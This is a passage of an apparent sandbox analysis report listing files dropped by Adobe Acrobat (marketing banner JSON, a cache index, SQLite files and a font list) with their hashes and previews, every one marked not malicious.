                                                                                                      SHA-256:313B53A61D77BD7EABEA18F9164AAE3F790863CC739FDA4B210AFFCBEE00859E
                                                                                                      SHA-512:C85B7CDB8A66657F99A43F10F9F6E122D2BC3A6144507309A37771682E74BFEBD58ED0507A6EF508005F802EF19EBA908435B0313B4AC34EAD479F84973D6820
                                                                                                      Malicious:false
                                                                                                      Preview:{"analyticsData":{"responseGUID":"e6bb8b82-b260-4fdc-9666-b8ccb2763cea","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1708150595644,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"65179_200306ActionBlock_0","campaignId":65179,"containerId":"1","controlGroupId":"","treatmentId":"f7fa0e9f-7d25-4321-b719-c501bbb8a162","variationId":"200306"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJGcmVlIDctZGF5IHRyaWFsIn0sInVpIjp7InRpdGxlX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTQiLCJmb250X3N0eWxlIjoiMyJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjE0IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjoiIiwiZGVzY3JpcHRpb24iOiJDb252ZXJ0IGZpbGVzIHRvIGFuZCBmcm9tIFBERiBcbndpdGhvdXQgbGltaXRzLiIsImJhY2tncm91bmRfc3R5bGluZyI6eyJiYWNrZ3JvdW5k
                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1250
                                                                                                      Entropy (8bit):5.7075409638717005
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:Yv6XEY8lzvaoVLgEsy4c19ZrGmTBcu14wCh5rgos8ctq3Hu:YvxPFgnyl9ZrBTB5OJhFgos8c2Hu
                                                                                                      MD5:7C58FE57C3E5B1D17917B316EAE07224
                                                                                                      SHA1:25E4CDBDF5A3A834D40360FF23C2A2ED95A897D8
                                                                                                      SHA-256:23EEEE014A6C6E06827C4FC49D997463BF1BCC2084A68A4E293474F93D1A0519
                                                                                                      SHA-512:022969027F45CCB6D9048161FFFBC260C6B408228F3C2333343F7D93681AA15B99FABB3FA4BAD4EFD7E102A927B38C836EBE821CA4E8AF8A4405F4D0F7E5601B
                                                                                                      Malicious:false
                                                                                                      Preview:{"analyticsData":{"responseGUID":"e6bb8b82-b260-4fdc-9666-b8ccb2763cea","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1708150595644,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Disc_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"65179_200306ActionBlock_1","campaignId":65179,"containerId":"1","controlGroupId":"","treatmentId":"250f56c6-2d66-4fca-8033-eabbd2bc9951","variationId":"200306"},"containerId":1,"containerLabel":"JSON for DC_Reader_Disc_LHP_Banner","content":{"data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJGcmVlIDctZGF5IHRyaWFsIn0sInVpIjp7InRpdGxlX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTQiLCJmb250X3N0eWxlIjoiMyJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjE0IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjoiIiwiZGVzY3JpcHRpb24iOiJDb252ZXJ0LCBlZGl0IGFuZCBlLXNpZ24gUERGXG4gZm9ybXMgJiBhZ3JlZW1lbnRzLiIsImJhY2tncm91bmRfc3R5bGluZyI6eyJiYWNrZ3JvdW5kX2Nvb
                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):292
                                                                                                      Entropy (8bit):5.296998211264933
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:YEQXJ2HXEYHcK1HVoZcg1vRcR0YgI52EeoAvJfQ1rPeUkwRe9:YvXKXEY8K8Zc0vR8ZGY16Ukee9
                                                                                                      MD5:06DBD93DD06B3AE348568E951D751640
                                                                                                      SHA1:18428B9C8D00A0F6B05728CD5DAC3EB695A4B5B1
                                                                                                      SHA-256:CD621E4D27CC61E81FF33FFCD59697B0AAC0663587B9611ABE1A6266EBD0F669
                                                                                                      SHA-512:FD59D003D3B7117F2CC0486A3AA587143F34BF98F9E176426E2CD18B0CC7E9CE55EB2643A0636626D3C94B15055B5BEB5610ACC6367BCD91985832055FA81BEC
                                                                                                      Malicious:false
                                                                                                      Preview:{"analyticsData":{"responseGUID":"e6bb8b82-b260-4fdc-9666-b8ccb2763cea","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1708150595644,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1230
                                                                                                      Entropy (8bit):5.691472483737891
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:Yv6XEY8lzvat2LgEsk4ccVrhmTBcu14wChds8ctq3Hu:YvxeognkMVrYTB5OJhds8c2Hu
                                                                                                      MD5:10BE67810C612A5D274569A12D05BDC2
                                                                                                      SHA1:9CC356857D76BE8BE58B4CC3E5DAA44CFD0B85E7
                                                                                                      SHA-256:D915CE39F31563961E40E23466C1A4274ECEF9D2C86BD0734FF93522DCE3A49C
                                                                                                      SHA-512:EC256F7EA35EC7AB3DFF1EE313518C04DB140DFFE2DA9E416AEAF4ABE60690D259517435470B7BE475CDBED6EEE4D304821B0F1969E2E236D4965557F6CA0160
                                                                                                      Malicious:false
                                                                                                      Preview:{"analyticsData":{"responseGUID":"e6bb8b82-b260-4fdc-9666-b8ccb2763cea","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1708150595644,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Edit_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"65179_200306ActionBlock_3","campaignId":65179,"containerId":"1","controlGroupId":"","treatmentId":"07caa165-20a7-4c5f-adf8-061ef3d98af3","variationId":"200306"},"containerId":1,"containerLabel":"JSON for DC_Reader_Edit_LHP_Banner","content":{"data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJGcmVlIDctZGF5IHRyaWFsIn0sInVpIjp7InRpdGxlX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTQiLCJmb250X3N0eWxlIjoiMyJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjE0IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjoiIiwiZGVzY3JpcHRpb24iOiJFZGl0IHRleHQsIGltYWdlcywgcGFnZXMsIGFuZCBtb3JlLiIsImJhY2tncm91bmRfc3R5bGluZyI6eyJiYWNrZ3JvdW5kX2NvbG9yX2RhcmtfdGhlbWUiO
                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1368
                                                                                                      Entropy (8bit):5.752861203820029
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:Yv6XEY8lzvaFKLgEGcooZbq0jCaBrwJoZct5uWaHbX3Hu:YvxSEgNoNtlSJEc3uWaHbHHu
                                                                                                      MD5:23C77CC8C0305492404DA15CB8A0E532
                                                                                                      SHA1:D9E41FD3A1E6D82279D2E7E4FA77A7DA4E0B8FB3
                                                                                                      SHA-256:39C301FEFFE5A107B38B1EF8F08CE5CB01B3BD90ADB4BA2E74A751C755EDB41D
                                                                                                      SHA-512:3B12838AEFA8803EF167246D560FB8C0498607C62D6C78BFFAB5DA802A61B17872D1144F6177D9C92BB991FBB36059A173D331604C0BCE918F495950F549C6FE
                                                                                                      Malicious:false
                                                                                                      Preview:{"analyticsData":{"responseGUID":"e6bb8b82-b260-4fdc-9666-b8ccb2763cea","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1708150595644,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Home_LHP_Trial_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"70654_217714ActionBlock_0","campaignId":70654,"containerId":"1","controlGroupId":"","treatmentId":"692283b7-dc9d-4f79-9ee2-bccf324c2980","variationId":"217714"},"containerId":1,"containerLabel":"JSON for DC_Reader_Home_LHP_Trial_Banner","content":{"data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJUcnkgQWNyb2JhdCBQcm8ifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNyIsImZvbnRfc3R5bGUiOiIwIn0sImRlc2NyaXB0aW9uX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTEiLCJmb250X3N0eWxlIjoiLTEifSwidGl0bGUiOiJGcmVlIDctZGF5IHRyaWFsIiwiZGVzY3JpcHRpb24iOiJHZXQgdW5saW1pdGVkIGFjY2VzcyB0byBhbGwgUERGIGFuZCBlLXNpZ25pbmcgdG9vbHMuIiwiYmFja2d
                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):289
                                                                                                      Entropy (8bit):5.300499742443011
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:YEQXJ2HXEYHcK1HVoZcg1vRcR0YgI52EeoAvJfYdPeUkwRe9:YvXKXEY8K8Zc0vR8ZGg8Ukee9
                                                                                                      MD5:2A88ADC949A8447DC6FD9BA24A9CEAAD
                                                                                                      SHA1:28F3B914923A1FC1C483B74772BB17CADE76FAC2
                                                                                                      SHA-256:E9722820ED6C90849D3C6D4E763DE2CC78A723012CC9000B1996D0384E25A777
                                                                                                      SHA-512:FBC5E87E63550232BFF20DC1583427417744F33A723F61156245DAAE3E2892C236BAB2F94097603B13D5241ADD27D23915298C6D8959AF2A71A5739B7D028C9A
                                                                                                      Malicious:false
                                                                                                      Preview:{"analyticsData":{"responseGUID":"e6bb8b82-b260-4fdc-9666-b8ccb2763cea","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1708150595644,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1395
                                                                                                      Entropy (8bit):5.778431456479854
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:Yv6XEY8lzva4rLgEGOc93W2JeFmaR7CQzttgBcu141CjrWpHfRzVCV9FJNH:YvxRHgDv3W2aYQfgB5OUupHrQ9FJx
                                                                                                      MD5:1D7D31A4F413593FF514CC378716305E
                                                                                                      SHA1:0DDCFCF58D7B41ECDF733E71F014032B0CF10AF9
                                                                                                      SHA-256:88CD32E52B893D2BF5EC75B8A82FC846AF4051B37F76E520742BBF8FE6F2C33E
                                                                                                      SHA-512:A7D4149D2AC2E4B0C9F3CC92EAD4A40676A8B4E43474EC86F2AD33B1A3E1AE2BC3075C8E2866322FCBB1C9EB939B7CB8F73D7B4610D10EFE9263C32E8FBF6D7C
                                                                                                      Malicious:false
                                                                                                      Preview:{"analyticsData":{"responseGUID":"e6bb8b82-b260-4fdc-9666-b8ccb2763cea","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1708150595644,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_RHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"57802_176003ActionBlock_0","campaignId":57802,"containerId":"1","controlGroupId":"","treatmentId":"d0374f2d-08b2-49b9-9500-3392758c9e2e","variationId":"176003"},"containerId":1,"containerLabel":"JSON for Reader DC RHP Banner","content":{"data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJGcmVlIDctRGF5IFRyaWFsIiwiZ29fdXJsIjoiaHR0cHM6Ly9hY3JvYmF0LmFkb2JlLmNvbS9wcm94eS9wcmljaW5nL3VzL2VuL3NpZ24tZnJlZS10cmlhbC5odG1sP3RyYWNraW5naWQ9UEMxUFFMUVQmbXY9aW4tcHJvZHVjdCZtdjI9cmVhZGVyIn0sInVpIjp7InRpdGxlX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTQiLCJmb250X3N0eWxlIjoiMyJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjEyIiwiZm9udF9zdHlsZSI6IjMifSwidGl0
                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):291
                                                                                                      Entropy (8bit):5.28404340546091
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:YEQXJ2HXEYHcK1HVoZcg1vRcR0YgI52EeoAvJfbPtdPeUkwRe9:YvXKXEY8K8Zc0vR8ZGDV8Ukee9
                                                                                                      MD5:0085D0265BD4EDC29784F149EE4EBD8F
                                                                                                      SHA1:7602F48300273540F88CE2F41B3BA2D17C78370D
                                                                                                      SHA-256:E7C0C100A6DC770A7BF4F5D6337B6A545F2E8AABFF34F5010E99BD780EDC8D38
                                                                                                      SHA-512:69478D93374803ADFA9A056EC10C44CA12DE8918FA9FFA4C2FC8CAE8FA563294120EAD6920E68C22E7A666703A6211CDD1A90BEC9C4EFFEE6BFA50C429DDA20D
                                                                                                      Malicious:false
                                                                                                      Preview:{"analyticsData":{"responseGUID":"e6bb8b82-b260-4fdc-9666-b8ccb2763cea","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1708150595644,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):287
                                                                                                      Entropy (8bit):5.288387394667742
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:YEQXJ2HXEYHcK1HVoZcg1vRcR0YgI52EeoAvJf21rPeUkwRe9:YvXKXEY8K8Zc0vR8ZG+16Ukee9
                                                                                                      MD5:A27F1FE19D88EF669DB8CFF77BC4710E
                                                                                                      SHA1:BBF21C60541C0D7A4BE1600117ADD3775AD9A359
                                                                                                      SHA-256:3B1C97B99CF86CB704F2F5180C46D29E27028E844B0B8F1B00C62A9424DE4F0D
                                                                                                      SHA-512:E93DC7C1053031298672A5A0094FF8FDF1A65B88E7720BDEB9A03C09CB2B42E5CFC5D34BC25C46BD6D138849EA55DB93EF988D8BC282FBC2DEF8956CDD2B27A6
                                                                                                      Malicious:false
                                                                                                      Preview:{"analyticsData":{"responseGUID":"e6bb8b82-b260-4fdc-9666-b8ccb2763cea","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1708150595644,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1250
                                                                                                      Entropy (8bit):5.721093431619538
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:Yv6XEY8lzvaiamXayLgEs54c3drNaHmTBcu14wChqx+plVCV9FJN3Hu:YvxTBgn5drpTB5OJhr9Q9FJ9Hu
                                                                                                      MD5:77442475720642EADB64081868243CAA
                                                                                                      SHA1:0053EF00C431152F35EF8C45244A1C14FCCD5256
                                                                                                      SHA-256:98F08E19A19F1F9D875A88E81BCA482AF26455074CC2E5DF255B65576EF2C78C
                                                                                                      SHA-512:2AA41990C3FD93A29C7B1CC94B92B0328B6F14D0F04A707A55B613A935A85C061C139AEB5CFE481E57E8D6CDAA7B4D588C59CBFC4A3D2FDCA1E9C84BEC0D6A0B
                                                                                                      Malicious:false
                                                                                                      Preview:{"analyticsData":{"responseGUID":"e6bb8b82-b260-4fdc-9666-b8ccb2763cea","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1708150595644,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"65179_200306ActionBlock_2","campaignId":65179,"containerId":"1","controlGroupId":"","treatmentId":"8deb148d-1a64-4e57-9648-e8bf939c598e","variationId":"200306"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJGcmVlIDctZGF5IHRyaWFsIn0sInVpIjp7InRpdGxlX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTQiLCJmb250X3N0eWxlIjoiMyJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjE0IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjoiIiwiZGVzY3JpcHRpb24iOiJTZW5kIGRvY3VtZW50cyAmIGZvcm1zIFxuZm9yIGZhc3QgZS1zaWduaW5nIG9ubGluZS4iLCJiYWNrZ3JvdW5kX3N0eWxpbmciOnsiYmFja2dyb3VuZF9jb
                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):286
                                                                                                      Entropy (8bit):5.265360594267829
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:YEQXJ2HXEYHcK1HVoZcg1vRcR0YgI52EeoAvJfshHHrPeUkwRe9:YvXKXEY8K8Zc0vR8ZGUUUkee9
                                                                                                      MD5:51C4D6E54B55228DE7AA3AF28374A3CE
                                                                                                      SHA1:32CD06BE0CB7274F5C9C4AE2B8C8BE4A6A53F822
                                                                                                      SHA-256:AC9066B739468D21A8E97A12D2E93A1097E73486FCD23150A38F6B3998B43F77
                                                                                                      SHA-512:D203F8DC656AD7884C255E18B7D5FA3BE6428A1F26A9AC0E0F8BDD7FB65AA572B28E04A64C79B167FE8692F72526C4AEA7AEFE30BDB44A10825AEB3A1F382C53
                                                                                                      Malicious:false
                                                                                                      Preview:{"analyticsData":{"responseGUID":"e6bb8b82-b260-4fdc-9666-b8ccb2763cea","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1708150595644,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):782
                                                                                                      Entropy (8bit):5.369784342865662
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:YvXKXEY8K8Zc0vR8ZGTq16Ukee1+3CEJ1KXd15kcyKMQo7P70c0WM6ZB/uhWBN:Yv6XEY8lzva1168CgEXX5kcIfANhu
                                                                                                      MD5:5C2AD77F3F19A68DBDFC7F55EBE4A050
                                                                                                      SHA1:C1E46A7450D566F3DFAED8DF7F7180F7F0CACB01
                                                                                                      SHA-256:02F333A07CFFDFCF15513CCF1A2E28659A9F5149CF53C025BE969107899D83A1
                                                                                                      SHA-512:150AC263DD91E247598CE0E9092FBD4A43AB09820F10D3E3CB01200FB1B076549941A35C4BD72A70F8E72D5523572A520D7C8E8EF29930D4D54132519FB1FF51
                                                                                                      Malicious:false
                                                                                                      Preview:{"analyticsData":{"responseGUID":"e6bb8b82-b260-4fdc-9666-b8ccb2763cea","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1708150595644,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"Edit_InApp_Aug2020"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"20360_57769ActionBlock_0","campaignId":20360,"containerId":"1","controlGroupId":"","treatmentId":"3c07988a-9c54-409d-9d06-53885c9f21ec","variationId":"57769"},"containerId":1,"containerLabel":"JSON for switching in-app test","content":{"data":"eyJ1cHNlbGxleHBlcmltZW50Ijp7InRlc3RpZCI6IjEiLCJjb2hvcnQiOiJicm93c2VyIn19","dataType":"application\/json","encodingScheme":true},"endDTS":1735804679000,"startDTS":1707974885707}}}}
                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):4
                                                                                                      Entropy (8bit):0.8112781244591328
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:e:e
                                                                                                      MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                                                      SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                                                      SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                                                      SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                                                      Malicious:false
                                                                                                      Preview:....
                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2818
                                                                                                      Entropy (8bit):5.1417842440000445
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:YlJLKdG1Sz1gP2XUF/ye9X2gdvVcgn9gO:EDkzfXUF/r9GYu2H
                                                                                                      MD5:8B65EEF3BB4C29F40784F23AEE8FA9DC
                                                                                                      SHA1:215D64265D72EF1619B82A57D69D7AE181148E9B
                                                                                                      SHA-256:49927DD8B68B7674F9CD32CE9DFA07ECE6179AA4468978F1FAE350455DDEA6D0
                                                                                                      SHA-512:CD033C89D6E7910970CF4A0372CCB896770876F0BC77589B1236B9CDCE9A17F2D7C38ECFCE66AE36A6620CBCC6842CD3F6C990D4BA121BEEBB068C590FAC07C5
                                                                                                      Malicious:false
                                                                                                      Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"b55946dbd1ea68dc3b9a8d7a0fab2888","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":1250,"ts":1707974885000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"644f3644741d7f88e726b026c05b4827","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":1368,"ts":1707974885000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"7fc45327dfabdb308a34691641f356aa","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1250,"ts":1707974885000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"0a23e2a51d95bc70efd1ae8dd7bc0b58","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1255,"ts":1707974885000},{"id":"DC_Reader_Edit_LHP_Banner","info":{"dg":"c2b882c948d76c65a1a9ca0555676983","sid":"DC_Reader_Edit_LHP_Banner"},"mimeType":"file","size":1230,"ts":1707974885000},{"id":"Edit_InApp_Aug2020","info":{"dg":"bc8eabd3c21dbd715c8ef31ce7144791","sid":"Edit_InApp_Aug2020"},"mimeType":"file","size":782,"ts":17
                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                                                                                      Category:dropped
                                                                                                      Size (bytes):12288
                                                                                                      Entropy (8bit):1.1872812382719795
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:TGufl2GL7msEHUUUUUUUUISvR9H9vxFGiDIAEkGVvpi:lNVmswUUUUUUUUI+FGSItm
                                                                                                      MD5:8E1E28287F5CD4B306A708B261419CED
                                                                                                      SHA1:5EBDFF9CB32CE4852A889540E82AA2956360F676
                                                                                                      SHA-256:630343D1733F6605762FE8E7AB560ACC7B9D5FCE26B8E5EE9666AAD1F1CA1DDA
                                                                                                      SHA-512:AA9A2597D3DC5E5DB02B7BF3C2435C2AD7E836CDA724D775D0FE7F6C24C8380FFCCB427453C71CF89B48BD867A8AF46F29FF52A244583725552DBF853EFED0CD
                                                                                                      Malicious:false
                                                                                                      Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                      File Type:SQLite Rollback Journal
                                                                                                      Category:dropped
                                                                                                      Size (bytes):8720
                                                                                                      Entropy (8bit):1.606729738534938
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:7MAKUUUUUUUUUUKvR9H9vxFGiDIAEkGVvYnqFl2GL7msm:7UUUUUUUUUUU2FGSItGnKVmsm
                                                                                                      MD5:3748F74E27A78960670D85AB563E3F46
                                                                                                      SHA1:53846B2EC693732ED850719538F0B41458B3562C
                                                                                                      SHA-256:532418E03A69F930A412B1C58B684E39DD27414D6521D362D9444D04A771326A
                                                                                                      SHA-512:B041E1A0FC8BDBEECF9AC4FB821F9F45E402CC00E4FA9A16F0861265B079A0215A43656A3BB60A20D6A95F6931CB48708595891AFBEB3BB8A895FF14AFC74ABE
                                                                                                      Malicious:false
                                                                                                      Preview:.... .c.......s.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................f.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):66726
                                                                                                      Entropy (8bit):5.392739213842091
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:768:RNOpblrU6TBH44ADKZEgHY9p3rGVSYsPLXJBIol/3R0nYyu:6a6TZ44ADEHYP3rGVSYsP1yK
                                                                                                      MD5:91688E80B4EFDEFEAE9887A67861346A
                                                                                                      SHA1:8C38BFB8DB3A468ABBFB371EBBAF6744CA2DECA7
                                                                                                      SHA-256:36DAC301FA972F0DADCAC92DC2F5602C4318F9D69A44212FCC0D4899D8D5ADCC
                                                                                                      SHA-512:7F39D68189D70D3E5AF5D83BA6692E938DBAADD857DE0E16AE39DEDAE82273560209EC2DBE83D8A2ED543E646DBA1D409C95E92B8F272D7C183971AD3A1A6615
                                                                                                      Malicious:false
                                                                                                      Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):21979
                                                                                                      Entropy (8bit):5.05760094196607
                                                                                                      Encrypted:false
